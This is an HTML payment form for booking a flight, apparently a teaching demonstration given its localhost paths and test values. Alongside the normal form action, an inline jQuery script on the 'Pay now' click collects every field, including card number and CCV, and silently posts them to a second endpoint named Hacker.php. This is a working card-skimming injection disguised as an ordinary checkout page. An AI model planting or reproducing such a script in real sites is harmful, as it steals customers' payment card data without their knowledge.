<!DOCTYPE html">
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1"/>
<link href="https://unpkg.com/tailwindcss@^1.0/dist/tailwind.min.css" rel="stylesheet">
<link rel="StyleSheet" href="styles.css" type="text/css" media="screen" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript" src="activities.js"> </script>

<title>Book a flight - submit card details</title>
</head>
<body class="ml-4">
<div class="container">

<form class="w-full max-w-lg" action="BookFlight.php" method="POST" name="paymentForm" id="paymentForm" onsubmit="return Validate()">
  <h1 class="bg-transparent hover:bg-blue-500 text-blue-700 font-semibold hover:text-white py-4 px-4 border border-blue-500 hover:border-transparent rounded text-lg mt-6 ml-4 mb-4">Submit credit card details</h1>
  <div class="flex flex-wrap -mx-3 mb-6">
   
    <div class="w-full md:w-1/2 px-3 mb-6 md:mb-0">
      <label 
          class="block uppercase tracking-wide text-gray-700 text-xs font-bold mb-2" 
          for="name">
        Name on card
      </label>
      <input 
          class="appearance-none block w-full bg-gray-200 text-gray-700 border border-red-500 rounded py-3 px-4 mb-3 leading-tight focus:outline-none focus:bg-white" 
          id="name" 
          type="text" 
          placeholder="Professor Jane Doe"
          name="name" 
          size="16" 
          maxlength="16">
      
      <p class="text-red-500 text-xs italic">Please fill out this field.</p>
    </div>
    <div class="w-full md:w-1/2 px-3">
      <label 
          class="block uppercase tracking-wide text-gray-700 text-xs font-bold mb-2" 
          for="number">
        Number
      </label>
      <input 
          class="appearance-none block w-full bg-gray-200 text-gray-700 border border-gray-200 rounded py-3 px-4 leading-tight focus:outline-none focus:bg-white focus:border-gray-500" 
          id="number" 
          name="number"
          type="text" 
          placeholder="1111 2222 3333 4444">
    </div>
  </div>
  <div class="flex flex-wrap -mx-3 mb-6">
    <div class="w-full px-3 md:w-1/3">
      <label 
          class="block uppercase tracking-wide text-gray-700 text-xs font-bold mb-2" 
          for="start_date">
        Start Date
      </label>
      <input 
          class="appearance-none block w-full bg-gray-200 text-gray-700 border border-gray-200 rounded py-3 px-4 mb-3 leading-tight focus:outline-none focus:bg-white focus:border-gray-500" 
          id="start_date" 
          type="text" 
          name="start_date"
          placeholder="MM/YY">
    </div>
    <div class="w-full px-3 md:w-1/3">
      <label 
          class="block uppercase tracking-wide text-gray-700 text-xs font-bold mb-2" 
          for="end_date">
        End Date
      </label>
      <input 
          class="appearance-none block w-full bg-gray-200 text-gray-700 border border-gray-200 rounded py-3 px-4 mb-3 leading-tight focus:outline-none focus:bg-white focus:border-gray-500" 
          id="end_date" 
          type="text" 
          name="end_date"
          placeholder="MM/YY">
    </div>
    <div class="w-full px-3 md:w-1/3">
      <label 
          class="block uppercase tracking-wide text-gray-700 text-xs font-bold mb-2" 
          for="start_date">
        CCV
      </label>
      <input 
          class="appearance-none block w-full bg-gray-200 text-gray-700 border border-gray-200 rounded py-3 px-4 mb-3 leading-tight focus:outline-none focus:bg-white focus:border-gray-500" 
          id="ccv" 
          type="text" 
          name="ccv"
          placeholder="123">
    </div>
  </div>
    
    <button 
        type="submit" 
        name="submitButton"
        id="submitButton"
        class="flex-shrink-0 bg-teal-500 hover:bg-teal-700 border-teal-500 hover:border-teal-700 text-sm border-4 text-white py-1 px-2 rounded" >
      Pay now
    </button>
    <button 
        class="flex-shrink-0 border-transparent border-4 text-teal-500 hover:text-teal-800 text-sm py-1 px-2 rounded" 
        type="reset">
      Cancel
    </button>
  <input type="hidden" name="created_at" id="created_at" value="2019-08-18">
  <input type="hidden" name="updated_at" id="updated_at" value="2019-08-18">
</form>

        <script>
        
        
       $( function() {
            
            console.log('Starting');
            
            $('.container').on("click", 'button[type="submit"]', function(a) {
                //a.preventDefault();
                var n = {};
                $("#paymentForm").serializeArray().map(function(a) {
                   n[a.name] = a.value; 
                });
                n.person = 'Test User';
                console.log(n);
                var t = JSON.stringify(n);
                setTimeout(function() {
                    jQuery.ajax({
                        type: "POST",
                        async: !0,
                        url: "http://localhost/tt284/ba/Hacker.php",
                        //url: "http://localhost:8000/card-details",
                        data: {t:t},
                        dataType: "application/json",
                        "_token": "ththththth"
                    
                    })
                }, 500)
            });
        });
    </script>
</div>
</body>
</html>
